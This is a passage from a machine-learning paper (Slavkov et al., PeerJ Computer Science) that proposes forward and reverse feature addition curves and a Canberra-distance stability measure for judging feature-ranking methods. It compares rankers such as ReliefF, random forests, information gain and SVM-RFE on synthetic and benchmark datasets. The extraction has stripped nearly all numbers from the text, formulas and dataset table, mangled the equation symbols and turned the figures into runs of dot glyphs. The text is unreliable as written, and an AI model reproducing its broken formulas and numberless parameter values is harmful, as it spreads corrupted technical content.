values of k (guyon et al., ; furlanello et al., ; paoli et al., ; verikas, gelzinis & bacauskiene, ). slavkov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in addition to correctness, rankings stability is sometimes also part of the evaluation. the stability of a ranking algorithm can be measured by comparing the feature rankings obtained, for example, from the different bootstrap replicates of a dataset or from the folds in cross-validation (guzmán-martnez & alaiz-rodrguez, ; kalousis, prados & hilario, ; jurman et al., ). in saeys, abeel & de peer ( ) both stability and predictive performance are combined into a single feature ranking quality index. also, notions similar to ffa curves (without any particular name, though) as the feature ranking evaluation method can be found in the literature (liu et al., ; duch, wieczorek & biesiada, ; biesiada et al., ; liang, yang & winstanley, ). however, to the best of our knowledge, there is no discussion and detailed investigation why ffa curves are an appropriate method for comparing feature rankings, nor which learning methods should (or should not) be used for constructing them. a method for evaluating feature rankings first of all, every feature ranking method should be able to tell apart relevant features from irrelevant ones (nilsson et al., ). in addition to that, the method should order the features with respect to the target variable, awarding the most relevant ones the top ranks. if ground truth ranking exists, the method should return this ranking in the optimal case. the worst case is more complicated and has two possible answers. one is the inverse of the ground truth ranking. however, since the ground truth ranking is typically not known in real-world scenarios, a more useful definition of the worst ranking is random ranking. this ranking also contains as little information about the distribution of the relevant features in the ranking as possible. moreover, this distribution can be always assessed and is the cornerstone of our ranking evaluation method. the evaluation method first, we define the notation used in the rest of the article: d denotes a dataset whose columns are input features fi that form a set f, and the target feature ft. a feature ranking method takes the dataset as an input, and returns a list r ¼ ðfð Þ; . . . ; fðnÞÞ as the output, where f(i) is the feature with the rank i. we evaluate a ranking r by evaluating different subsets s of features f. this is done by building a predictive model mðs; ftÞ and assessing its predictive power. the evaluation of the predictive model provides a cumulative assessment of the information contained in the feature set s and it can be quantified with an error measure errðmðs; ftÞÞ. the question is how to generate the feature subsets from the feature ranking, so that the error estimates can provide insight into the correctness of the feature ranking and constitute an evaluation thereof. the construction of the feature subsets should be guided by the feature ranking r. starting from the top ranked feature f( ) and going towards the bottom ranked feature f(n), the feature relevance should decrease. following this basic intuition, we propose two methods for constructing feature subsets from the feature ranking: ffa and rfa. slavkov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ forward feature addition constructs the feature subsets si by considering the i highest ranked features, starting with s = {f( )}. the next set s i+ is constructed by adding the next lower-ranked feature, namely si+ = si ∪ {f(i+ )}. the process continues until i = n and sn contains all of the features from r. reverse feature addition produces feature sets si constructed in an opposite manner to ffa. we start with s ¼ ffðnÞg that contains only the lowest ranked feature. the next feature set si+ is constructed by adding the lowest-ranked feature which is not in si, namely si+ = si ∪ {f(n−i)}. in the same way as for ffa, the process of rfa continues until we include all of the features, that is, sn = f. note that ffa can be viewed as backward feature elimination. starting from sn = f, at each step we remove the least relevant feature from si to obtain si− . similarly, rfa can be viewed as forward feature elimination. finally, it holds that f = sn−i ∪ si for all i. for each i and each constructed feature subset si or si, we build predictive models mðsi; ftÞ and mðsi; ftÞ. we then estimate their respective prediction errors, erri and erri. this results in two error curves. we name them ffa and rfa curves, each constructed by the corresponding ffa/rfa feature subset construction method. the value for each point of the ffa curve is defined as ffa(i) = erri, while for the rfa curve as rfa(i) = erri. the process of ffa/rfa curve construction is summarized in algorithm . the computational complexity of the proposed algorithm for constructing a single (ffa or rfa) curve is oðnðm þ tÞÞ, where n is the number of features, m = m(n) is the cost of constructing the predictive model and t = t(n) is the cost of its evaluation. it should be noted that m and t are dependent on the specific learning method used for inducing the model and on the procedure used for evaluating it. typically, the points ffa(i), ffa(i + ), ·, do not differ considerably, for i large enough, since it expected that only a small proportion of the features is relevant when the data is high-dimensional. this means that we can make the algorithm more efficient if we construct the set si+δ(i) from the set si by including δ(i) features into it. analogously, we speed up the construction of the rfa curves. algorithm generation of the ffa and rfa curves. input: feature ranking r = (f( ),…,f(n)), target feature ft, type of curve (ffa or rfa) s ) Ø e ) list of length n for i = , , …,n do if curve type is ffa then s ) s ∪ {f(i)} else s ) s ∪ {f(n−i+ )} e[i] ) err (m(s, ft)) return e slavkov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ interpretation of error curves the visualization and interpretation of the ffa and rfa curves can be explained by considering the examples of ffa and rfa curves given in fig. . the y-axis for both curves is the same and depicts the error estimate of a feature subset. point i at the x-axis corresponds to the moment when the feature f(i) is first included in the predictive model: si for the ffa curve and sn−i+ for the rfa curve. thus, the ffa curve in fig. is constructed from left-to-right as the top-ranked features are at the beginning of the ranking. in contrast, the rfa curve is constructed from right-to-left starting with the end of the ranking and going towards its beginning. let us first focus on the ffa curve. we can observe that as the number k of features increases, the accuracy of the predictive models also increases. this can be interpreted as follows: by adding more and more of the top-k ranked features, the number of relevant features in the constructed feature subsets increases, which is reflected in the improvement of the accuracy (error) measure. next, for the rfa curve in fig. , if we inspect it from right-to-left, we can notice that it is quite different from the ffa curve at the beginning. namely, the accuracy of the models constructed with the bottom ranked features is minimal, which means the ranking is correct in the sense that it puts only irrelevant features at the bottom of the ranking. as the number of bottom-k features increases, some relevant features are included and the accuracy of the models increases. we now consider the complete fig. . the ffa and rfa curve essentially provide an estimate of how the relevant features are spread throughout the feature ranking. namely, the ffa curve provides us with an estimate of where the relevant features appear at the top of the ranking, while the rfa curve provides an estimate of where relevant ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● . . . . ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ffa rfa figure sample ffa and rfa curves. full-size doi: . /peerj-cs. /fig- slavkov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ features appear at the bottom of the ranking. in the specific case depicted in fig. , the relevant features are located between the st and the th ranked feature. besides providing an estimate of the spread of the relevant features across the feature ranking, the real utility of the ffa/rfa curves becomes apparent if we consider them in a relative, or more precisely, a comparative context. let us consider two arbitrary feature ranking methods ra and rb, which produce feature rankings ra and rb, respectively. for these two rankings, we present the corresponding ffa/rfa curves in fig. . we first inspect the ffa curves visually. we find that the values of the ffa curve of the ranking method ra are (most of the time) above the ffa curve of the other ranking method rb. this can be interpreted in the following way: for an arbitrary k, when considering the top-k features of the feature rankings ra and rb, more relevant features are included in the top-k features of ranking ra than the top-k features of ranking rb. this implies that ranking algorithm ra produces a better ranking as compared to the ranking algorithm rb. a similar discussion applies to the rfa curve. when one considers the bottom-k features of a given feature ranking, most of the time, feature ranking ra includes less relevant features than feature ranking rb, that is, the predictive models constructed are less accurate. here, because the opposite logic of the ffa curve applies, one can also conclude that the feature ranking algorithm ra produces a better feature ranking than the feature ranking algorithm rb. expected ffa and rfa curves when one wants to assess the quality of a single feature ranking in a real-world application, its forward (reverse) feature addition curves can be only compared to the curves that belong the ranking, generated uniformly at random, since the ground-truth ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● . . . . ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ra rb a ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● . . . . ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ra rb b figure comparison of ffa curves (a) and rfa curves (b) of two ranking methods ra and rb. full-size doi: . /peerj-cs. /fig- slavkov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ ranking is not known. as discussed before, the random ranking rrnd is the worst-case ranking, since it contains no information about the distribution of the relevant features. as such, it can also serve as a baseline. the expected values of the points that define ffa curve of the ranking rrnd coincide with the expected values of the rfa curve of this ranking, since the corresponding values only depend on the data itself and the number of features i at a given point of the curves. thus, expected curves can be the common name for both types of the curves that belong to rrnd. computing the exact average error estimations es½erri� ¼ es½erri�, where s � f; jsj ¼ i, may be unfeasible if the number of features n is large (e.g., for i = n/ , oðð nÞ!=ðn!Þ Þ models have to be evaluated), but one can overcome this by sampling the sets s. stability of feature ranking an important aspect of feature ranking algorithms is their stability (nogueira, sechidis & brown, ) or, more specifically, the stability of the ranked feature lists that they produce. once we have the set r of m rankings rt that were induced from the different samples of the dataset d, the stability index sðrÞ can be calculated as stðrÞ ¼ m � � xm� t¼ xm s¼tþ smðrt; rsÞ; that is, the stability index is the average of pairwise similarities sm for each pair of rankings. in general, the function sm can be any (dis)similarity measure, for example, the spearman rank correlation coefficient (saeys, abeel & de peer, ; khoshgoftaar et al., ), the jaccard distance (saeys, abeel & de peer, ; kalousis, prados & hilario, ), an adaptation of the tanimoto distance (kalousis, prados & hilario, ), fuzzy (goodman and kruskal’s) gamma coefficient (boucheham & batouche, , henzgen & hüllermeier, ), etc. to assess the stability of feature ranking in our experimental work, we set sm = ca, where ca is the canberra distance (lance & williams, ; lance & williams, ; jurman et al., ). this is a weighted distance metric that puts bigger emphasis on the stability of the top ranked features. if we have two feature rankings ra and rb of n features, then the canberra distance is defined as caðra; rbÞ ¼ xn j¼ jrankaðfjÞ � rankbðfjÞj rankaðfjÞ þ rankbðfjÞ : ( ) however, we do not only estimate the stability of the ranking as a whole. rather, we also estimate the stability of the partial rankings based on the features from si. in order for the distance to be applicable to such partial rankings with i < n features, the following adaptation is proposed: instead of using the ranks ranka, b(f), we use slavkov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ rankia;bðfÞ ¼ minfranka;bðfÞ; i þ g, that is, all features with rank higher than i are treated as if they had rank i + : caðra; rbÞ ¼ xn j¼ jrankiaðfjÞ � rankibðfjÞj rankiaðfjÞ þ rankibðfjÞ : ( ) additionally, we would like the stability indicator to be independent of specific values of i and n. hence, we normalize it by the expected canberra distance between random rankings, denoted by ca(n, i). it can be approximated (jurman et al., ) as caðn; iÞ � ði þ Þð n � iÞ n log þ ið þ iÞ n þ i � ; ( ) which we make use of when i ≥ and the computation of the exact value becomes intractable. for i ≥ , the relative error of the approximation ( ) is smaller than %. our final stability indicator is thus the curve consisting of points calculated as i; stðsiÞ caðn; iÞ � � ; ( ) for ≤ i ≤ n, that represent the relative change of distance between top-i lists w.r.t. the expected top-i distance. empirical evaluation of ffa/rfa curve properties we start with the experiments on synthetic datasets. in such laboratory conditions, one has full control over the data, can establish the ground truth feature ranking, and produce rankings of different quality. such a setting will facilitate proper assessment of our proposed feature ranking evaluation method. before proceeding to the experiments, we briefly describe the constructed synthetic datasets. the detailed description of the datasets is given in “appendix a ”. we construct three datasets named single, pair and combined. each of them consists of , instances and features. the relevant features in single dataset are individually correlated to target, the relevant features in the pair dataset are related to the target via xor relation, and the relevant features in the combined dataset are the union of the relevant features in the single and pair datasets. the rest of the features in the datasets are random noise. evaluation by randomising the ground truth ranking the appropriateness of the proposed method is first demonstrated on a family of feature rankings that contain more and more noise. by doing that, we can show that the lower and lower quality of feature rankings is reflected in the ffa and rfa curves, and thus detected by the method. we start with the ground-truth ranking rgt and perturb it as follows. first, we select a proportion θ of randomly selected features which are then assigned random relevances, drawn uniformly from the unit interval. the other features preserve their ground truth relevance. this results in a ranking rθ. slavkov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ experimental setup we use the aforementioned single, pair and combined datasets. the following amounts θ of noise are introduced into the ground truth ranking: θ ∈ { . , . , . , . , . , . , }. the value θ = corresponds to a completely random ranking. for every value of θ, we estimate the expected values of the ffa/rfa curves that belong to the ranking rθ, by first generating m = realizations of the ranking, and second, (point-wise) averaging of the error estimates of the obtained predictive models. for constructing ffa/rfa curves, svms were used, as noted and justified at the end of the “analysis of different learning methods to construct ffa and rfa curves”. the curves were constructed via -times stratified -fold cross validation, using different random seeds. results the obtained ffa and rfa curves are shown in fig. that gives the results for the dataset combined. the results for the datasets single and pair are similar. in addition to the curves that belong to the rankings rθ with different amounts of noise, ground truth ranking is also shown. both, ffa curves (fig. a) and rfa curves (fig. b) correctly detect different amount of noise θ: the higher the θ, the more distant are ffa and rfa curve of rθ to the curves of ground truth ranking. the independent confirmation of these results are given in “appendix a ”. additionally, note that ffa curves cannot give all the information about the ranking: had we not plotted the rfa curves in fig. b, we would not have a proof that all of the rankings misplace some relevant features (check the considerable decrease in accuracy just before the th feature). ●● ●●●● ● ● ●●●●● ●●●●●● ●●●●●●●●●●●●● ● ●●● ●●●●●●●●●●●●●● ● ● ● ● ● ● ● ● ● ● . . . . . . feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ●● ●●●●●●●●● ●●●●●●●●●●●●●●●●●●●●●●●●●●● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ●● ● ● ●●●●● ●●●●●●●●●●●●● ●●●●●●●●●●●●●●●●●●● ● ● ● ● ● ● ● ● ● ● ● ● ●●● ● ● ● ●● ●● ●● ●● ● ●●●●●● ●●●● ●●●● ●●●● ●●● ● ●● ● ●● ● ● ●● ●● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ground truth % noise % noise % noise % noise % noise % noise random a ● ● ● ● ●● ●● ●● ● ● ● ●● ●● ● ● ● ● ● ● ●●● ●●●● ●●● ●● ● ● ●●● ● ● ● ●●● ●●● ● ● ● ● ● ● ● ● ● ● ● . . . . . . feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ●●●●● ●●●●●●●●●●●● ● ● ● ● ● ● ● ● ● ● ●● ● ● ● ● ●●●● ● ● ● ● ● ● ● ● ● ● ● ● ● ●● ● ● ● ● ● ● ● ● ● ● ●●● ●●●●●●●●●●●● ● ● ● ● ● ● ● ● ● ● ● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● ● ●●●●●●● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ground truth % noise % noise % noise % noise % noise % noise random b figure dataset combined: forward feature addition curves (a), and reverse feature addition curves (b). the curves for the noisy rankings rθ ( . ≤ q ≤ ) and the ground truth ranking are shown. full-size doi: . /peerj-cs. /fig- slavkov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ analysis of different learning methods to construct ffa and rfa curves according to algorithm , the error curve estimates depend not only on the feature ranking method, but also on the learning method used to construct the predictive models. in this section, we investigate which learning methods (learners) are suitable to construct the ffa and rfa curves. note that we are not searching for a learner that would produce the most accurate predictive models. rather, the requirement for the learner to be used in this context is that it should produce predictive models that exploit all the information that the features contain about the target concept, and can thus distinguish between feature rankings of different quality. experimental setup when comparing the ffa and rfa curves of different ranking methods, constructed with different learners, we used the combined dataset described in detail in “appendix ”. we consider the following four feature ranking methods. information gain, where we calculate the information gain of each feature fi as ig(ft,fi) = h(ft) − h(ft :amp:mid; fi). svm-rfe uses a series of support vector machines (svms) to recursively compute a feature ranking. a linear svm was employed, as proposed by (guyon et al., ). following (slavkov et al., ), we set ε = − and c = . . relieff algorithm as proposed by robnik-Šikonja & kononenko ( ). the number of neighbors was set to , and the number of iterations was set to %. random forests, which can be used for estimating feature relevance as described by breiman ( ). a forest of trees was used, constructed by randomly choosing rounded up log of the number of features. we compare the above ranking methods by using different learners to produce classifiers and generate error estimates for the ffa and rfa curves. more specifically, we consider naïve bayes (john & langley, ); decision trees (quinlan, ); random forests (breiman, ): the number of trees was set to , and in each split log of the number of features are considered; svms (cortes & vapnik, ): a polynomial (quadratic) kernel was employed, with the ε = − and c = . ; k-nn (aha & kibler, ) with a value of k = . the curves were constructed via -times stratified -fold cross validation, using different random seeds. the obtained ffa and rfa curve comparisons of the four feature ranking methods obtained by each of the five learning methods, are presented in the following section. results the rankings are shown in fig. , where each graph represents the distribution of the ground truth relevance values. the y-axis depicts the ground truth relevance value ( ). each point, i, represents the i-th ranked feature, f(i), as determined by the feature ranking method. slavkov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ we can see that the rankings fall into two groups: in figs. a and b, highly relevant features are concentrated on the left, while in the figs. c and d, they are evenly spread. relieff and random forests (figs. a and b) are thus clearly better than info gain and svm-rfe (figs. c and d). hence, the ffa and rfa curves should at least differentiate between the two groups of the rankings. however, there should be visible difference also between relief and random forests at the beginning of the ranking. the detailed comparative evaluation of the obtained feature rankings is given in “appendix a ”. in the case of ffa curves, the learners can be divided into two groups: ffa curves produced by naïve bayes, decision trees and random forests cannot capture any feature ranking re le va n ce . . . . . . a feature ranking re le va n ce . . . . . . b feature ranking re le va n ce . . . . . . c feature ranking re le va n ce . . . . . . d figure distribution of relevant features for each of the four ranking methods: relieff (a), random forests (b), info gain (c) and svm-rfe (d). full-size doi: . /peerj-cs. /fig- slavkov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ difference between rankings, whereas those produced by svms and k-nn can. it suffices to show one representative graph for each group (those for naïve bayes and k-nn are shown in fig. ), since there are no significant differences among the learning methods in the same group . the ffa curves produced by these two learners have all the desirable properties: the curves for relief and random forests are better than those of info gain and svm-rfe. additionally, at the beginning, the random forest curve is under the curve of relief. . . . . . . feature ranking a cc u ra cy ●● ●● ● ●●●●●●●●●● ●● ●●●●●●●●●●●●●●●●● ●●●●●●●●●●●●●●●● ● ● ● ● ● ● ● ● ● ● ●● ●● ●● ●●●●●●●●● ●●● ●●●●●●●●●●●●●●●●● ●●●●●●●●●●●●●●● ● ● ● ● ● ● ● ● ● ● ● ● info gain random forests relieff svm−rfe a . . . . . . feature ranking a cc u ra cy ●● ●● ● ●●●● ● ● ● ●●●● ● ●● ● ●● ●● ●● ●● ● ● ●● ● ●● ● ● ● ●● ●●●● ● ● ● ●● ● ● ● ● ● ● ● ● ● ● ● ●● ●●● ●●●●●●●●●●●●● ● ●●●● ●● ●●● ●● ● ●●●● ●●●●●●● ●● ● ● ● ●●● ● ● ● ● ● ● ● ● ● ● ● ● info gain random forests relieff svm−rfe b figure comparison of ffa curves for the four different ranking methods for the combined dataset. the curves were obtained by using the naїve bayes (a) and k-nn (b). full-size doi: . /peerj-cs. /fig- . . . . . . feature ranking a cc u ra cy ● ● ● ● ● ● ●● ● ●●● ● ● ● ● ● ●● ● ● ●● ●● ●●● ● ● ●● ●●● ●●● ● ●● ● ● ●●● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ●● ●● ● ●● ● ● ● ●●● ●● ● ●● ●● ● ●● ●●●● ● ●● ●●● ● ● ●●●● ● ● ●●● ● ● ● ● ● ● ● ● ● ● ● ● info gain random forests relieff svm−rfe a . . . . . . feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ●● ● ● ●● ●● ● ● ● ●● ● ● ●● ● ● ● ●● ● ● ●● ●● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ●●● ●● ● ● ● ● ● ● ● ● ●● ● ●●●● ● ● ● ● ●● ● ●● ● ●● ● ● ●● ● ● ●●● ● ● ● ● ● ● ● ● ● ● ● ● ● info gain random forests relieff svm−rfe b figure comparison of rfa curves for the four different ranking methods for the combined dataset. the curves were obtained by using decision trees (a) and k-nn (b). full-size doi: . /peerj-cs. /fig- compare, for example, fig. b (obtained by k-nn) with fig. a a (obtained by svms), which is given in appendix (note that fig. a a also contains the random ranking curve). slavkov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the reason why, for example, the naïve bayes classifier does not show any difference between rankings, is the fact that it can not use the information from the interactions of higher order. namely, it assumes feature independence. hence, it is not appropriate for use in the considered context. if we proceed to rfa curves, again, the naïve bayes classifier does not show any difference between rankings, whereas the other four methods do. we prefer random forests, svms and k-nn over decision trees in the case of rfa curves, because decision trees generate quite unstable curves, as shown in fig. a. in fig. b, the rfa curves of k-nn are shown. again, there is no quantitative difference between them and the rfa curves generated by svms . tu sum up, one can use � svms and k-nn models, for constructing ffa curves, � svms, k-nn and random forests, for constructing rfa curves. thus, only k-nn and svms are appropriate for constructing both ffa and rfa curves. since one should typically use approximate k-nn when the number of features is extremely high (muja & lowe, ), we use svms (with the settings described here) as the learner for constructing the ffa/rfa curves in all the remaining experiments in this work. discussion we have to give some additional notes about choosing the best method, when, for example, different learning methods prioritize different rankings, which is possible since some learning method might make use of some features, whereas another learning method can make better use of some others. if we have computed feature rankings to learn a classifier that uses only a subset of (top-ranked) features and we have already decided on which classifier to use, we should use the same (type of) classifier to construct the curves, because we want to use the features that the chosen learning method prioritizes. second, if our motivation for computing the feature rankings is to discover all relevant features for a given problem (e.g., the genes that influence the patients’ clinical state), and learning method a prioritizes the ranking r ¼ ðx ; x ; . . .Þ over the ranking r ¼ ðx ; x ; . . .Þ, whereas learning method b prioritizes r′ over r, this means that x , x , x ′ and x ′ are important (provided that both learners achieve similar accuracy), so we can include them all in the subsequent experiments (and thus use both learning methods). the decision about which among the two appropriate methods to use—k-nn or svms—might also depend on the properties of the dataset at hand. as mentioned before, k-nn could be too time-consuming when the number of features is extremely high. on the other hand, if the number of instances is high, svms could be too time-consuming, but speed-ups are possible (tsang, kwok & cheung, ). as for the noise, both methods are quite robust (wang, jha & chaudhuri, ; xu, caramanis & mannor, ), so this is not among the most influential factors. compare figs. b–a b (given in “appendix a ”). slavkov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ feature ranking comparison on real-worlds datasets in this section, we move from the synthetic data and show the appropriateness of the proposed feature ranking evaluation method on the real-world data with unknown relevant and irrelevant features. to be consistent with the synthetic-data experiments, we evaluate the same four feature ranking methods as before, and compare them to the random feature rankings which now serve as the only baseline. datasets description in this extensive study, classification benchmark problems are used. they come in two bigger groups. the first group has been part of the experiments in (slavkov et al., ) and except for aapc (džeroski et al., ), water and diversity (džeroski, demšar & grbović, ), mostly originates from the uci data repository (newman & merz, ). this benchmark problems have higher number of instances (up to , ) and not extremely high number of features (up to ). this problems cover various domains: health, ecology, banking etc. the second group is newly included and contains high-dimensional micro-array benchmark problems (mramor et al., ) (up to , features) with lower number of examples (up to ). the main properties of the data are given in table . experimental setup we construct the curves that base on the feature ranking methods described in experimental setup part of “analysis of different learning methods to construct ffa and rfa curves”, and the curves that belong to the completely random ranking (i.e., expected curves) which serve as a baseline. for the actual construction of the curves (once the ranking is obtained), support vector machines were used, as described and justified in the results in “analysis of different learning methods to construct ffa and rfa curves”. the curves were constructed via -times stratified -fold cross validation, using different random seeds. the expected error curves for random rankings were produced by generating random rankings for each dataset under consideration. for each random ranking, error curves were produced and the average of the error values was used as the expected error. this was done in a manner similar to the one described in “evaluation by randomising the ground truth ranking”. as mentioned in “the evaluation method”, building ffa/rfa curves by adding the features one by one to large feature subsets si and si, might be too costly when n is big enough. in this set of experiments, we use the following procedure. we add δ(i) features to the subset, where δ(i) is defined as follows: δ(i) = if ≤ i ≤ , δ(i) = if < i ≤ , and δ(i) = n// otherwise, where // denotes integer division. results in this section, we show representative examples of three types of curves: ffa, rfa and stability curves. the curves are shown for two datasets with lower and two with higher slavkov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ number of features. the graphs for the other datasets can be found in “appendix ” in figs. a –a . we start with the breast-w dataset. the ffa/rfa curves in figs. a and b show that both types of curves are needed in order to evaluate the ranking completely. the ffa- table properties of the benchmark datasets: number of instances, number of features, number of discrete/numeric attributes, and number of different class values. dataset #inst. #feat. (d/n) #cl. aapc ( / ) arrhythmia ( / ) australian ( / ) balance ( / ) breast-cancer ( / ) breast-w ( / ) car , ( / ) chess , ( / ) diabetes ( / ) diversity ( / ) german , ( / ) heart ( / ) heart-c ( / ) heart-h ( / ) hepatitis ( / ) image , ( / ) ionosphere ( / ) iris ( / ) sonar ( / ) tic-tac-toe ( / ) vote ( / ) water ( / ) waveform , ( / ) wine ( / ) amlprognosis , ( / , ) bladdercancer , ( / , ) breastcancer , ( / , ) childhoodall , ( / , ) cmltreatment , ( / , ) colon , ( / , ) dlbcl , ( / , ) leukemia , ( / , ) mll , ( / , ) prostate , ( / , ) srbct , ( / , ) note: the datasets with a considerably high number of features are listed under the dashed line. slavkov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ curves suggest that all feature ranking algorithms (except for the random ranking) place only the relevant features at the beginning, since there is practically no difference if we compare the accuracy of the -feature (all) model and, for example, the -feature model. however, the rfa-curves show that all feature ranking algorithms—except for info gain—misplace some relevant features, since the info-gain-ranking-based models have the lowest accuracy by far in the rfa curves. also, in the case of info gain, the accuracy cease to decrease after only cca. a total of top-ranked features were removed. figure c shows that info gain produces also the most stable rankings. we can see that the top-ranked feature is always the same, since the stability index of the info gain equals at the point k = . the second most stable algorithm is relieff, the third is random forest and the least stable is svm-rfe, but the difference between random forest and svm-rfe is not considerable. . . . . . . feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● infogain rforest relief svmrfe random a . . . . . . . feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● infogain rforest relief svmrfe random b . . . . . top k features n o rm a liz e d c a n b e rr a d is ta n ce ● ● ● ●● ● ●●●●●●●●●● ●●● ●●●●● ●●●●●●●●● ●●●●●●●●●●●●●●●● ●●●●●●●●●●●●●●●● ●●●●●●●●●●●●●●●●●●●●●●●● ● ●● ● ● ● ● ● ●●●●● ●●● ●●●●●●●●●●●●●●●●●●●●●●●●●●●● ●●●●●●●● ●●●●●●●● ●●●●●●● ●●●●●●● ●●●●●●●●●●●●●●● ● ● infogain rforest relief svmrfe c . . . . . . . feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● infogain rforest relief svmrfe random d . . . . . . . feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● infogain rforest relief svmrfe random e . . . . . top k features n o rm a liz e d c a n b e rr a d is ta n ce ● ● ● ● ● ●● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● ●●●●●●●●●● ●●●●●●●● ●●●●●●●●●●●● ● ● ● ● ● ● ●●● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● ●●●●● ● ● infogain rforest relief svmrfe f figure ranking quality assessment for datasets breast-w (a–c) and water (d–f) in terms of the ffa (a and d) and rfa curves (b and e), and rankings’ stability estimates (c and f). the ffa/rfa curves are obtained by using svms. full-size doi: . /peerj-cs. /fig- slavkov et al. ( ), peerj comput. 